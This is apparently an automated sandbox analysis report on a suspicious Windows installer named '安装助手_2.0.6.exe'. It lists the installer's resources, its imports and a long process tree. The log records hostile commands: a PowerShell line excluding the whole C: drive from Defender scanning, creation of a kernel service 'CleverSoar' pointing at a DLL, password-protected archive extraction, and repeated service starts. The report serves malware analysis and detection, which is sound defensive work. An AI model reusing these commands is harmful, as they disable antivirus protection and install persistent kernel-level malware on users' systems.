RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1590909090909092
RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2804532577903683
RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                                      DLL | Import
                                      kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                      comctl32.dll | InitCommonControls
                                      user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                      oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                      advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                      Name | Ordinal | Address
                                      __dbk_fcall_wrapper | 2 | 0x40fc10
                                      dbkFCallWrapperAddr | 1 | 0x4b063c
                                      Language of compilation system | Country where language is spoken | Map
                                      English | United States |
                                      No network behavior found

                                      Target ID:0
                                      Start time:03:10:40
                                      Start date:23/12/2024
                                      Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
                                      Imagebase:0x570000
                                      File size:5'707'631 bytes
                                      MD5 hash:2FAB10855EFC0DC62A255FF1E6EC8FA6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:03:10:41
                                      Start date:23/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20420,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
                                      Imagebase:0xaf0000
                                      File size:3'366'912 bytes
                                      MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:3
                                      Start time:03:10:41
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:03:10:41
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:03:10:45
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff6ef0c0000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:6
                                      Start time:03:10:50
                                      Start date:23/12/2024
                                      Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
                                      Imagebase:0x570000
                                      File size:5'707'631 bytes
                                      MD5 hash:2FAB10855EFC0DC62A255FF1E6EC8FA6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Reputation:low
                                      Has exited:false

                                      Target ID:7
                                      Start time:03:10:50
                                      Start date:23/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$3043C,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
                                      Imagebase:0xd80000
                                      File size:3'366'912 bytes
                                      MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:8
                                      Start time:03:10:52
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:03:10:52
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:03:10:52
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:11
                                      Start time:03:10:52
                                      Start date:23/12/2024
                                      Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                      Wow64 process (32bit):true
                                      Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                      Imagebase:0x560000
                                      File size:831'200 bytes
                                      MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Has exited:true

                                      Target ID:12
                                      Start time:03:10:52
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:13
                                      Start time:03:10:53
                                      Start date:23/12/2024
                                      Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                      Wow64 process (32bit):true
                                      Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                      Imagebase:0x560000
                                      File size:831'200 bytes
                                      MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:14
                                      Start time:03:10:53
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:15
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:16
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:20
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:21
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:23
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:35
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:36
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:37
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:38
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:39
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:42
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:44
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:46
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:47
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:48
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:49
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:50
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:51
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:52
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:53
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
